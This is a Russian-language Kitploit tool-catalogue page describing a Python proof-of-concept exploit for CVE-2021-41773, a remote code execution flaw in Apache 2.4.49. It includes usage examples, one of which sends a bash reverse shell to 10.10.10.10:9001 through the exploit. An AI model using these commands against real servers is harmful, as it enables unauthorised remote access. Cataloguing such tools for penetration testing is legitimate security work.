Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-41773 — Python-основанный концепт-доказательство эксплойта для CVE-2021-41773, обеспечивающий удаленное выполнение кода на серверах Apache 2.4.49 с настраиваемыми параметрами команды и порта. | Kitploit
Инструменты/GitHubGitHub/gunzf0x/cve-2021-41773
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingИнструмент Удаленного Доступа
GitHubgunzf0x/cve-2021-41773

CVE-2021-41773

Python-основанный концепт-доказательство эксплойта для CVE-2021-41773, обеспечивающий удаленное выполнение кода на серверах Apache 2.4.49 с настраиваемыми параметрами команды и порта.

Репозиторий
11 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-41773 - Удаленное выполнение кода в Apache 2.4.49

PoC для CVE-2021-41773, так как я нашел только переусложненные эксплойты, а этот ведет прямо к удаленному выполнению кода.


Использование

Просто укажите IP-адрес уязвимого сервера Apache 2.4.49 с помощью флага -i и желаемую системную команду с помощью флага -c. Если веб-сервер работает не на порту 80, укажите его с помощью -p, а если веб-сервер использует HTTPs, нужно использовать флаг --use-https.

root@kitploit:~
$ python3 CVE-2021-41773.py -i 10.10.10.10 -c 'id'

$ python3 CVE-2021-41773.py -i example.com -p 8080 -c '/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.10.10/9001 0>&1"'

$ python3 CVE-2021-41773.py -i 20.20.20.20 -p 443 --use-https -c 'whoami'

Используйте на свой страх и риск (:

Будьте этичны.

Скачать инструмент